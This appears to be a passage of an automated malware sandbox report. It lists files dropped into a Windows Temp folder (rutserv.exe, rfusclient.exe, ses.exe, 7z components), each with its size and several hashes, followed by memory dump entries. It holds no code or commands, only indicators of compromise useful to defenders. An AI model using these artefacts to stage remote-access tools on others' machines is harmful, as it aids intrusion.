e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ses.exe
Filesize
46KB

MD5
771c4d6a2b4419d6598ec589a54212f5

SHA1
445f2be41589b527f643b09bf6a86ba88fd00b95

SHA256
942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226

SHA512
f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ses.exe
Filesize
46KB

MD5
771c4d6a2b4419d6598ec589a54212f5

SHA1
445f2be41589b527f643b09bf6a86ba88fd00b95

SHA256
942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226

SHA512
f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8

Download Submit
\Users\Admin\AppData\Local\Temp\F529.tmp\7z.dll
Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe
Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe
Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
5.8MB

MD5
9a9cad56988e3c52f154187752ef453e

SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff

SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161

SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0

Download Submit
\Users\Admin\AppData\Local\Temp\ses.exe
Filesize
46KB

MD5
771c4d6a2b4419d6598ec589a54212f5

SHA1
445f2be41589b527f643b09bf6a86ba88fd00b95

SHA256
942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226

SHA512
f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8

Download Submit
\Users\Admin\AppData\Local\Temp\ses.exe
Filesize
46KB

MD5
771c4d6a2b4419d6598ec589a54212f5

SHA1
445f2be41589b527f643b09bf6a86ba88fd00b95

SHA256
942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226

SHA512
f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8

Download Submit
\Users\Admin\AppData\Local\Temp\ses.exe
Filesize
46KB

MD5
771c4d6a2b4419d6598ec589a54212f5

SHA1
445f2be41589b527f643b09bf6a86ba88fd00b95

SHA256
942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226

SHA512
f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8

Download Submit
memory/276-100-0x0000000000000000-mapping.dmp

Download
memory/328-78-0x0000000000000000-mapping.dmp

Download
memory/532-76-0x0000000000000000-mapping.dmp

Download
memory/556-73-0x0000000000000000-mapping.dmp

Download
memory/560-88-0x0000000000000000-mapping.dmp

Download
memory/624-101-0x0000000000000000-mapping.dmp

Download
memory/632-77-0x0000000000000000-mapping.dmp

Download
memory/748-75-0x0000000000000000-mapping.dmp

Download
memory/1080-95-0x0000000000000000-mapping.dmp

Download
memory/1116-98-0x0000000000000000-mapping.dmp

Download
memory/1276-96-0x0000000000000000-mapping.dmp

Download
memory/1284-92-0x0000000000000000-mapping.dmp

Download
memory/1288-81-0x0000000000000000-mapping.dmp

Download
memory/1304-70-0x0000000000000000-mapping.dmp

Download
memory/1408-79-0x0000000000000000-mapping.dmp

Download
memory/1512-110-0x0000000000000000-mapping.dmp

Download
memory/1584-111-0x0000000000000000-mapping.dmp

Download
memory/1608-55-0x0000000000000000-mapping.dmp

Download
memory/1648-103-0x0000000000000000-mapping.dmp

Download
memory/1724-84-0x0000000000000000-mapping.dmp

Download
memory/1752-54-0x0000000076261000-0x0000000076263000-memory.dmp

Filesize
8KB

Download
memory/1776-116-0x0000000000000000-mapping.dmp

Download
memory/1816-99-0x0000000000000000-mapping.dmp

Download
memory/1828-83-0x0000000000000000-mapping.dmp

Download
memory/1860-80-0x0000000000000000-mapping.dmp

Download
memory/1940-60-0x0000000000000000-mapping.dmp

Download
memory/1960-82-0x0000000000000000-mapping.dmp

Download
memory/1984-97-0x0000000000000000-mapping.dmp

Download